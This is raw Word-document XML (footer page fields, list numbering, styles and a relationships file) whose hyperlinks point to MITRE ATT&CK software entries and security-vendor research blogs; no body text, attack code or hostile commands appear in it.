        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES  \* Arabic  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="09259388" w14:textId="77777777" w:rsidR="003168F2" w:rsidRDefault="003168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28A4F" w14:textId="77777777" w:rsidR="00CC2890" w:rsidRDefault="00CC2890" w:rsidP="006537E8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="07033084" w14:textId="77777777" w:rsidR="00CC2890" w:rsidRDefault="00CC2890" w:rsidP="006537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1499"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C186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6299C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFA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D7805"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76E0077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757F28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C44D9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0D2641"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96AA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C610ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1122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7B1F14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC5A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C22E17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B474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BD5A0A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10E4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0D1951"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D67C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DF608E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2588E9C"/>
    <w:lvl w:ilvl="0" w:tplc="761EEBC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:sz w:val="36"/>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3CB75B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8AD0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0C5B6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5114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5C3C27"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4E2FA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BF82608"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8486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1A380F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97A0507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1C6F07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="424C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E01C6A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74F4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EF61EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D56A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932E1C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4042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A634D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="094891A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FD66D4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0550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4A7828"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F622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3C1EEA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A04D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9535B56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6896C2F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B5A1A7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B50E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1B19EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2C2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4C5EE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5FBA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7F78FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C11CE5A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FAA1879"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0532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566B2A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0306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482867"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="46F2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F2155D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9676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CC2A62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDC0D3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F41C63"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9424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BD775F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB68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317B16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ABD0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84624C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99B2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214DC4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E22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9A12D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25E8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4C25C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E90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8D3843"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A92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D91AD6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5346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000C38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D4C6585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5B62170B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F5C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83691E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE94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A64B34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E4E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560370"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F82A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D87634"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F7BE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3D793E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="44942FF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0267005"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D32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DF1579"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D1D2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F143A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C69A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664B87"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E1E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840ED8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C44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5F6EF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="453E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F53699"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="887EC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792D42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7B23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0EB4143"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EAFE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1603A93"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD6E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BF7419"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7BAC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376DB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="001C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427AF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C514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390659"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="838873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3696038">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1576819450">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1478112481">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="818770357">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="756681883">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1893535934">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1467090689">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1354188618">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1159154066">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1674339999">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="117602700">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1392389532">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="137767026">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1076244591">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="662242192">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1048069421">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="839272368">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="679965542">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="708410955">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1935896707">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1599172959">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="91173881">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1072893430">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1783189297">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1686709572">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="852575755">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="442650021">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="904491507">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1636258555">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="425342825">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="576675274">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="253058562">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="702172402">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1349715838">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="200411084">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="562376472">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1204101141">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="779766467">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1823888639">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1060667078">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="189730774">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="203953231">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1449856600">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1197431967">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="2084452771">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1345867058">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1529297804">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="1553157217">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1546525449">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="49575625">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1587307216">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="1126196059">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="1666203698">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1118646601">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1388920236">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="466894393">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="79837362">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="698631600">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="1668630401">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="471558378">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="386799669">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="989754311">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="945432266">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="282077058">
    <w:abstractNumId w:val="50"/>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66B"/>
    <w:rsid w:val="00175DEC"/>
    <w:rsid w:val="001A1788"/>
    <w:rsid w:val="001B2CDA"/>
    <w:rsid w:val="002E1989"/>
    <w:rsid w:val="00306C1A"/>
    <w:rsid w:val="003168F2"/>
    <w:rsid w:val="0055266B"/>
    <w:rsid w:val="005632D5"/>
    <w:rsid w:val="006537E8"/>
    <w:rsid w:val="00700371"/>
    <w:rsid w:val="007423AA"/>
    <w:rsid w:val="0084001D"/>
    <w:rsid w:val="00882677"/>
    <w:rsid w:val="008C4E21"/>
    <w:rsid w:val="00970745"/>
    <w:rsid w:val="009B4494"/>
    <w:rsid w:val="00AC4402"/>
    <w:rsid w:val="00AD249E"/>
    <w:rsid w:val="00B42FCF"/>
    <w:rsid w:val="00B701FC"/>
    <w:rsid w:val="00B7237E"/>
    <w:rsid w:val="00C94863"/>
    <w:rsid w:val="00CC017C"/>
    <w:rsid w:val="00CC2890"/>
    <w:rsid w:val="00D37264"/>
    <w:rsid w:val="00D937F5"/>
    <w:rsid w:val="00E06C0C"/>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ACABA0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{70027E0E-CC00-4BCA-A52F-2B676F766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66B"/>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55266B"/>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55266B"/>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5526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26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26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6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6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6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66B"/>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55266B"/>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55266B"/>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5526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26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26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6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6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66B"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="0055266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5266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5266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5266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5266B"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="0055266B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0055266B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="0055266B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="005526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266B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="0055266B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006537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37E8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006537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37E8"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006537E8"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006537E8"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C9486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blogs.vmware.com/security/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/?utm_source=chatgpt.com" TargetMode="External"/><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ttack.mitre.org/software/S0570" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0564/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research.html?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0569/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0570/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0568" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mitre.org/focus-areas/cybersecurity/mitre-attack?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/blog/threat-insight?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://intezer.com/blog/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0567/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0568/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research.html?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0560" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/blog/threat-insight?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0565" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0056/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0564/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0565/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0560/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources?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attack.mitre.org/software/S0569" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0561/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0562/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0562" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/stopransomware?utm_source=chatgpt.com"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attack.mitre.org/software/S0561" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0567" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship 